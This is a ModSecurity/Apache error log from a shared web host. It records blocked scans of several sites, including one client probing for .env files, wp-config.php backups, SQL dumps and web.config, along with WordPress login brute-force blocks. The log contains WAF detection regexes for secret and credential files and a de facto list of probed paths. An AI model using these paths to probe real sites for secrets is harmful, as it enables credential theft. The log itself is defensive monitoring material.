[Tue May 26 18:40:50.198905 2026] [security2:error] [pid 1015481:tid 1015552] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/.env"] [unique_id "ahWb2rQIKfWDMlp2INdX4gABVkY"]
[Tue May 26 18:40:50.507165 2026] [security2:error] [pid 1015481:tid 1015553] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/app/.env"] [unique_id "ahWb2rQIKfWDMlp2INdX6QABXUc"]
[Tue May 26 18:40:50.952949 2026] [security2:error] [pid 1015481:tid 1015573] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/src/.env"] [unique_id "ahWb2rQIKfWDMlp2INdX8gABaFs"]
[Tue May 26 18:40:51.366945 2026] [security2:error] [pid 1015481:tid 1015583] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend/.env"] [unique_id "ahWb27QIKfWDMlp2INdX_QABbGU"]
[Tue May 26 18:40:51.578721 2026] [security2:error] [pid 1015481:tid 1015679] [client 69.58.91.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWb27QIKfWDMlp2INdYAAAAAU4"], referer: https://www.anujtradingco.com/
[Tue May 26 18:40:51.682515 2026] [security2:error] [pid 1015481:tid 1015534] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/.env"] [unique_id "ahWb27QIKfWDMlp2INdYCAABUjQ"]
[Tue May 26 18:40:51.720923 2026] [security2:error] [pid 1015481:tid 1015660] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb27QIKfWDMlp2INdX-gAAATs"]
[Tue May 26 18:40:52.007614 2026] [security2:error] [pid 1015481:tid 1015605] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config.php"] [unique_id "ahWb3LQIKfWDMlp2INdYDgABcHs"]
[Tue May 26 18:40:52.364354 2026] [security2:error] [pid 1015481:tid 1015575] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/settings.php"] [unique_id "ahWb3LQIKfWDMlp2INdYGAABRF0"]
[Tue May 26 18:40:52.689608 2026] [security2:error] [pid 1015481:tid 1015551] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php"] [unique_id "ahWb3LQIKfWDMlp2INdYGgABfkU"]
[Tue May 26 18:40:52.881711 2026] [security2:error] [pid 1015481:tid 1015661] [client 165.140.119.146:62014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWb3LQIKfWDMlp2INdYGQAAATw"], referer: https://www.bloggertarget.com
[Tue May 26 18:40:52.881831 2026] [security2:error] [pid 1015481:tid 1015661] [client 165.140.119.146:62014] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWb3LQIKfWDMlp2INdYGQAAATw"], referer: https://www.bloggertarget.com
[Tue May 26 18:40:52.933328 2026] [security2:error] [pid 1015481:tid 1015581] [remote 162.241.152.21:55170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWb3LQIKfWDMlp2INdYIQABamM"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 18:40:52.996098 2026] [security2:error] [pid 1015481:tid 1015554] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config.php.bak"] [unique_id "ahWb3LQIKfWDMlp2INdYIwABFkg"]
[Tue May 26 18:40:53.781440 2026] [security2:error] [pid 1015481:tid 1015557] [remote 160.250.186.220:37174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWb3bQIKfWDMlp2INdYLgABYEs"]
[Tue May 26 18:40:53.814991 2026] [security2:error] [pid 1015481:tid 1015574] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.backup"] [unique_id "ahWb3bQIKfWDMlp2INdYMgABX1w"]
[Tue May 26 18:40:54.207181 2026] [security2:error] [pid 1015481:tid 1015544] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.bak"] [unique_id "ahWb3rQIKfWDMlp2INdYNgABEj4"]
[Tue May 26 18:40:54.289493 2026] [security2:error] [pid 1015481:tid 1015563] [remote 160.250.186.220:37174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWb3rQIKfWDMlp2INdYNwABgVE"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:40:54.497660 2026] [security2:error] [pid 1015481:tid 1015578] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.old"] [unique_id "ahWb3rQIKfWDMlp2INdYQQABTmA"]
[Tue May 26 18:40:54.785049 2026] [security2:error] [pid 1015481:tid 1015670] [client 182.8.122.117:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb3rQIKfWDMlp2INdYPQAAAUU"]
[Tue May 26 18:40:54.887986 2026] [security2:error] [pid 1015481:tid 1015571] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.save"] [unique_id "ahWb3rQIKfWDMlp2INdYRQABMFk"]
[Tue May 26 18:40:54.933165 2026] [security2:error] [pid 1015481:tid 1015620] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb3rQIKfWDMlp2INdYRAAAARM"]
[Tue May 26 18:40:55.043443 2026] [security2:error] [pid 1015481:tid 1015482] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.swp"] [unique_id "ahWb37QIKfWDMlp2INdYTQABFAA"]
[Tue May 26 18:40:55.224472 2026] [security2:error] [pid 1015481:tid 1015564] [remote 50.6.192.190:33430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWb37QIKfWDMlp2INdYTAABblI"]
[Tue May 26 18:40:55.291382 2026] [security2:error] [pid 1015481:tid 1015546] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.txt"] [unique_id "ahWb37QIKfWDMlp2INdYTwABY0A"]
[Tue May 26 18:40:55.411416 2026] [security2:error] [pid 1015481:tid 1015653] [client 124.43.5.103:29713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb37QIKfWDMlp2INdYUAAAATQ"]
[Tue May 26 18:40:55.411654 2026] [security2:error] [pid 1015481:tid 1015653] [client 124.43.5.103:29713] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb37QIKfWDMlp2INdYUAAAATQ"]
[Tue May 26 18:40:55.501165 2026] [security2:error] [pid 1015481:tid 1015545] [remote 50.6.192.190:33430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWb37QIKfWDMlp2INdYUQABRz8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:40:56.672865 2026] [security2:error] [pid 1015481:tid 1015596] [remote 216.73.216.30:59007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWb4LQIKfWDMlp2INdYZwABGHI"]
[Tue May 26 18:40:57.459864 2026] [security2:error] [pid 1015481:tid 1015684] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb4bQIKfWDMlp2INdYbwAAAVM"]
[Tue May 26 18:40:57.919407 2026] [security2:error] [pid 1015481:tid 1015518] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWb4bQIKfWDMlp2INdYggABMyQ"]
[Tue May 26 18:40:57.919604 2026] [security2:error] [pid 1015481:tid 1015652] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWb4bQIKfWDMlp2INdYggABMyQ"]
[Tue May 26 18:40:58.380579 2026] [security2:error] [pid 1015481:tid 1015736] [client 69.58.91.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWb4rQIKfWDMlp2INdYkAAAAYc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 18:41:00.003019 2026] [security2:error] [pid 1015481:tid 1015695] [client 104.28.122.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWb47QIKfWDMlp2INdYsQAAAV4"]
[Tue May 26 18:41:00.354424 2026] [security2:error] [pid 1015481:tid 1015718] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb47QIKfWDMlp2INdYtQAAAXU"]
[Tue May 26 18:41:00.685905 2026] [security2:error] [pid 1015481:tid 1015630] [client 78.47.98.55:43922] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWb5LQIKfWDMlp2INdYvwAAAR0"], referer: https://thegoodsporting.com
[Tue May 26 18:41:01.631416 2026] [security2:error] [pid 1015481:tid 1015538] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/web.config"] [unique_id "ahWb5bQIKfWDMlp2INdYywABbTg"]
[Tue May 26 18:41:01.737135 2026] [core:crit] [pid 1015481:tid 1015634] (13)Permission denied: [client 40.77.167.61:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:41:02.505233 2026] [fcgid:warn] [pid 1015481:tid 1015731] (70014)End of file found: [client 66.132.186.181:23324] mod_fcgid: can't get data from http client
[Tue May 26 18:41:02.824175 2026] [security2:error] [pid 1015481:tid 1015624] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb5rQIKfWDMlp2INdY4QAAARc"]
[Tue May 26 18:41:05.434291 2026] [security2:error] [pid 1015481:tid 1015693] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb6bQIKfWDMlp2INdZDgAAAVw"]
[Tue May 26 18:41:06.065970 2026] [security2:error] [pid 1015481:tid 1015662] [client 124.43.5.103:30301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb6rQIKfWDMlp2INdZKgAAAT0"]
[Tue May 26 18:41:06.066125 2026] [security2:error] [pid 1015481:tid 1015662] [client 124.43.5.103:30301] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb6rQIKfWDMlp2INdZKgAAAT0"]
[Tue May 26 18:41:06.154413 2026] [security2:error] [pid 1015481:tid 1015531] [remote 111.229.141.137:47822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahWb6bQIKfWDMlp2INdZKAABKzE"]
[Tue May 26 18:41:06.281683 2026] [security2:error] [pid 1015481:tid 1015643] [client 51.77.74.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "filosha.com"] [uri "/index.php"] [unique_id "ahWb6bQIKfWDMlp2INdZHQAAASo"]
[Tue May 26 18:41:06.288498 2026] [security2:error] [pid 1015481:tid 1015565] [remote 92.205.109.21:43578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWb6rQIKfWDMlp2INdZOQABKVM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:41:07.329870 2026] [security2:error] [pid 1015481:tid 1015652] [client 114.119.137.122:50901] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acacia.org.in"] [uri "/index.php"] [unique_id "ahWb67QIKfWDMlp2INdZUQAAATM"], referer: http://www.acacia.org.in/
[Tue May 26 18:41:07.818406 2026] [security2:error] [pid 1015481:tid 1015663] [client 51.77.74.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "filosha.com.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWb67QIKfWDMlp2INdZXgAAAT4"]
[Tue May 26 18:41:08.036298 2026] [security2:error] [pid 1015481:tid 1015726] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb67QIKfWDMlp2INdZWwAAAX0"]
[Tue May 26 18:41:08.461174 2026] [security2:error] [pid 1015481:tid 1015537] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/database.sql"] [unique_id "ahWb7LQIKfWDMlp2INdZcgABFDc"]
[Tue May 26 18:41:08.720690 2026] [security2:error] [pid 1015481:tid 1015583] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWb7LQIKfWDMlp2INdZdgABCmU"]
[Tue May 26 18:41:08.720943 2026] [security2:error] [pid 1015481:tid 1015611] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWb7LQIKfWDMlp2INdZdgABCmU"]
[Tue May 26 18:41:09.029537 2026] [security2:error] [pid 1015481:tid 1015558] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/dump.sql"] [unique_id "ahWb7bQIKfWDMlp2INdZhQABQkw"]
[Tue May 26 18:41:09.749764 2026] [security2:error] [pid 1015481:tid 1015575] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backup.sql"] [unique_id "ahWb7bQIKfWDMlp2INdZjAABiF0"]
[Tue May 26 18:41:10.431161 2026] [security2:error] [pid 1015481:tid 1015637] [client 136.144.42.199:31323] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWb7LQIKfWDMlp2INdZfwAAASQ"]
[Tue May 26 18:41:10.488035 2026] [security2:error] [pid 1015481:tid 1015549] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/db.sql"] [unique_id "ahWb7rQIKfWDMlp2INdZpQABL0M"]
[Tue May 26 18:41:10.824397 2026] [security2:error] [pid 1015481:tid 1015707] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb7rQIKfWDMlp2INdZoQAAAWo"]
